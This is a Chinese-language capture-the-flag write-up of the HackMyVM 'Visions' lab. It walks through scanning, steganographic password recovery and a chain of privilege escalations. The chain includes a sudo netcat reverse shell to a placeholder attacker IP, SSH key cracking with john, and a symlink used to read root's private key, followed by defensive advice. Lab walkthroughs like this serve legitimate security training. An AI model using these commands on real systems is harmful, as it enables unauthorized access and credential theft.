hackmyvm系列11——visions
字数 1153 2025-08-12 11:34:21

HackMyVM系列11——Visions靶机渗透教学文档

靶机概述

Visions是HackMyVM系列的第11个靶机,难度中等,涉及信息收集、隐写术、权限提升等技术点。本教学文档将详细讲解渗透过程。

信息收集阶段

1. 端口扫描

使用Nmap进行全端口扫描:

nmap -sV -Pn -sC -A 192.168.56.184 -p 0-65535

2. 目录扫描

使用Gobuster进行目录爆破:

gobuster dir -u http://192.168.56.184/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html

注:初始扫描可能未发现有用信息

3. 网页源代码分析

查看网页源代码发现:

  • 用户名:alicia
  • 页面使用白色图片作为背景

4. 隐写术分析

下载白色图片并检查隐藏信息:

wget http://192.168.56.184/white.png
zsteg white.png

发现隐藏的密码信息

初始访问

1. SSH登录

使用发现的凭据登录:

ssh alicia@192.168.56.184

用户名:alicia,密码从图片隐写获取

权限提升阶段

1. 初始提权尝试

上传常用提权脚本进行检测:

# 上传linpeas或其他提权脚本
chmod +x linpeas.sh
./linpeas.sh

可能未发现直接可利用的漏洞

2. SUID检查

查找具有SUID权限的文件:

find / -perm -u=s -type f 2>/dev/null

未发现可直接利用的SUID文件

3. Sudo权限检查

检查当前用户的sudo权限:

sudo -l

发现可以以emma用户身份执行nc

4. 利用nc反弹shell

利用sudo权限获取emma用户的shell:

sudo -u emma nc -e /bin/sh [攻击机IP] [监听端口]

在攻击机监听:

nc -lvnp [监听端口]

5. 稳定shell获取

获取更稳定的shell:

python3 -c "import pty;pty.spawn('/bin/bash');"

6. 进一步信息收集

重新检查图片文件,发现更多隐藏信息:

steghide extract -sf white.png

获得新密码:seemstobeimpossible

7. 切换到sophia用户

使用新密码登录:

su sophia
密码:seemstobeimpossible

8. 检查sophia的sudo权限

sudo -l

发现可以以isabella用户身份执行cat

9. 读取隐藏文件

尝试读取isabella用户的隐藏文件:

sudo -u isabella cat /home/isabella/.invisible

发现包含SSH密钥信息

10. 破解SSH密钥

使用john破解SSH密钥密码:

ssh2john id_rsa >> hash.txt
john hash.txt --wordlist=rockyou.txt

获得密码:invisible

11. 登录isabella账户

使用破解的密钥登录:

ssh -i id_rsa isabella@localhost
密码:invisible

12. 最终提权

利用.invisible文件的特殊权限获取root权限:

ln -sf /root/.ssh/id_rsa .invisible
sudo -u root cat /home/isabella/.invisible

获取root的SSH私钥

13. 以root身份登录

使用获取的root私钥登录:

ssh -i root_id_rsa root@localhost

关键知识点总结

  1. 隐写术分析:使用zsteg和steghide工具分析图片中的隐藏信息
  2. 权限提升路径
    • alicia → emma (通过sudo nc)
    • emma → sophia (通过图片隐藏密码)
    • sophia → isabella (通过sudo cat)
    • isabella → root (通过.invisible文件链接)
  3. SSH密钥破解:使用ssh2john和john工具破解加密的SSH私钥
  4. 符号链接利用:通过创建符号链接绕过权限限制读取root私钥

防御建议

  1. 避免在图片等非文本文件中存储敏感信息
  2. 限制sudo权限,避免过度授权
  3. 对SSH私钥使用强密码保护
  4. 定期检查系统上的SUID文件和特殊权限设置
  5. 监控系统上的符号链接创建行为
HackMyVM系列11——Visions靶机渗透教学文档 靶机概述 Visions是HackMyVM系列的第11个靶机,难度中等,涉及信息收集、隐写术、权限提升等技术点。本教学文档将详细讲解渗透过程。 信息收集阶段 1. 端口扫描 使用Nmap进行全端口扫描: 2. 目录扫描 使用Gobuster进行目录爆破: 注:初始扫描可能未发现有用信息 3. 网页源代码分析 查看网页源代码发现: 用户名: alicia 页面使用白色图片作为背景 4. 隐写术分析 下载白色图片并检查隐藏信息: 发现隐藏的密码信息 初始访问 1. SSH登录 使用发现的凭据登录: 用户名:alicia,密码从图片隐写获取 权限提升阶段 1. 初始提权尝试 上传常用提权脚本进行检测: 可能未发现直接可利用的漏洞 2. SUID检查 查找具有SUID权限的文件: 未发现可直接利用的SUID文件 3. Sudo权限检查 检查当前用户的sudo权限: 发现可以以emma用户身份执行nc 4. 利用nc反弹shell 利用sudo权限获取emma用户的shell: 在攻击机监听: 5. 稳定shell获取 获取更稳定的shell: 6. 进一步信息收集 重新检查图片文件,发现更多隐藏信息: 获得新密码: seemstobeimpossible 7. 切换到sophia用户 使用新密码登录: 8. 检查sophia的sudo权限 发现可以以isabella用户身份执行cat 9. 读取隐藏文件 尝试读取isabella用户的隐藏文件: 发现包含SSH密钥信息 10. 破解SSH密钥 使用john破解SSH密钥密码: 获得密码: invisible 11. 登录isabella账户 使用破解的密钥登录: 12. 最终提权 利用.invisible文件的特殊权限获取root权限: 获取root的SSH私钥 13. 以root身份登录 使用获取的root私钥登录: 关键知识点总结 隐写术分析 :使用zsteg和steghide工具分析图片中的隐藏信息 权限提升路径 : alicia → emma (通过sudo nc) emma → sophia (通过图片隐藏密码) sophia → isabella (通过sudo cat) isabella → root (通过.invisible文件链接) SSH密钥破解 :使用ssh2john和john工具破解加密的SSH私钥 符号链接利用 :通过创建符号链接绕过权限限制读取root私钥 防御建议 避免在图片等非文本文件中存储敏感信息 限制sudo权限,避免过度授权 对SSH私钥使用强密码保护 定期检查系统上的SUID文件和特殊权限设置 监控系统上的符号链接创建行为